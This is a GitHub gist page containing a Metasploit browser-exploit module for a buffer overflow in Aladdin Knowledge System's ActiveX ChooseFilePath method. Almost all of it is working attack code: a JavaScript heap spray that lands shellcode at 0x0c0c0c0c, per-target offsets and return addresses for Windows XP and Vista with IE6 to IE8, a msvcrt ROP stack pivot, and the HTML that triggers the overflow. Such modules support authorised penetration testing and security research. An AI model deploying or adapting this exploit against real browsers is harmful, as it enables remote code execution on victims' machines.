Last active
December 28, 2015 01:38
-
-
Save jvazquez-r7/7421555 to your computer and use it in GitHub Desktop.
BrowserExploitServer Aladdin Exploit
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
## | |
# This module requires Metasploit: http//metasploit.com/download | |
# Current source: https://github.com/rapid7/metasploit-framework | |
## | |
require 'msf/core' | |
class Metasploit3 < Msf::Exploit::Remote | |
Rank = NormalRanking | |
include Msf::Exploit::Remote::BrowserExploitServer | |
def initialize(info={}) | |
super(update_info(info, | |
'Name' => "Aladdin Knowledge System Ltd ChooseFilePath Buffer Overflow", | |
'Description' => %q{ | |
This module exploits a vulnerability found in Aladdin Knowledge System's | |
ActiveX component. By supplying a long string of data to the ChooseFilePath() | |
function, a buffer overflow occurs, which may result in remote code execution | |
under the context of the user. | |
}, | |
'License' => MSF_LICENSE, | |
'Author' => | |
[ | |
'shinnai', #Vulnerability Discovery | |
'b33f', #Original exploit | |
'sinn3r', #Metasploit | |
'juan vazquez' #Metasploit, IE8 target | |
], | |
'References' => | |
[ | |
[ 'OSVDB', '86723' ], | |
[ 'EDB', '22258' ], | |
[ 'EDB', '22301' ] | |
], | |
'Payload' => | |
{ | |
'StackAdjustment' => -3500 | |
}, | |
'DefaultOptions' => | |
{ | |
'InitialAutoRunScript' => 'migrate -f' | |
}, | |
'Platform' => 'win', | |
'BrowserRequirements' => | |
{ | |
:source => /script|headers/i, | |
:clsid => "{09F68A41-2FBE-11D3-8C9D-0008C7D901B6}", | |
:method => "ChooseFilePath", | |
:os_name => /win/i | |
}, | |
'Targets' => | |
[ | |
[ 'Automatic', {} ], | |
[ | |
'Windows XP with IE 6', | |
{ | |
'os_flavor' => 'XP', | |
'ua_name' => 'MSIE', | |
'ua_ver' => '6.0', | |
'Rop' => false, | |
'Offset' => '0x5F4', | |
'Ret' => 0x0c0c0c0c | |
} | |
], | |
[ | |
'Windows XP with IE 7', | |
{ | |
'os_flavor' => 'XP', | |
'ua_name' => 'MSIE', | |
'ua_ver' => '7.0', | |
'Rop' => false, | |
'Offset' => '0x5F4', | |
'Ret' => 0x0c0c0c0c | |
} | |
], | |
[ | |
'Windows XP with IE 8', | |
{ | |
'os_flavor' => 'XP', | |
'ua_name' => 'MSIE', | |
'ua_ver' => '8.0', | |
'Rop' => true, | |
'Offset' => '0x5f6', | |
'Ret' => 0x77c2282e # stackpivot # mov esp,ebp # pop ebp # retn # msvcrt.dll | |
} | |
], | |
[ | |
'Windows Vista with IE 7', | |
{ | |
'os_flavor' => 'Vista', | |
'ua_name' => 'MSIE', | |
'ua_ver' => '7.0', | |
'Rop' => false, | |
'Offset' => '0x5F4', | |
'Ret' => 0x0c0c0c0c | |
} | |
] | |
], | |
'Privileged' => false, | |
'DisclosureDate' => "Apr 1 2012", | |
'DefaultTarget' => 0)) | |
end | |
def ie_heap_spray(p) | |
js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(get_target.arch)) | |
js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(get_target.arch)) | |
# Land the payload at 0x0c0c0c0c | |
js = %Q| | |
var heap_obj = new heapLib.ie(0x20000); | |
var code = unescape("#{js_code}"); | |
var nops = unescape("#{js_nops}"); | |
while (nops.length < 0x80000) nops += nops; | |
var offset = nops.substring(0, #{get_target['Offset']}); | |
var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length); | |
while (shellcode.length < 0x40000) shellcode += shellcode; | |
var block = shellcode.substring(0, (0x80000-6)/2); | |
heap_obj.gc(); | |
for (var i=1; i < 0x300; i++) { | |
heap_obj.alloc(block); | |
} | |
| | |
js = heaplib(js, {:noobfu => true}) | |
return js | |
end | |
def exploit_template(cli, target_info) | |
if get_target['Rop'] | |
p = generate_rop_payload('msvcrt', get_payload(cli, target_info), {'target'=>'xp'}) | |
else | |
p = get_payload(cli, target_info) | |
end | |
spray = ie_heap_spray(p) | |
target_ret = Rex::Text.to_hex([get_target.ret].pack("V")) | |
html_template = %Q| | |
<html> | |
<object id="pwnd" classid="clsid:09F68A41-2FBE-11D3-8C9D-0008C7D901B6"></object> | |
<script> | |
<%=spray%> | |
junk=''; | |
for( counter=0; counter<=267; counter++) junk+=unescape("%0c"); | |
pwnd.ChooseFilePath(junk + "<%=target_ret%>"); | |
</script> | |
</html> | |
| | |
return html_template, binding() | |
end | |
def on_request_exploit(cli, request, target_info) | |
print_status("Sending HTML...") | |
send_exploit_html(cli, exploit_template(cli, target_info)) | |
end | |
end | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment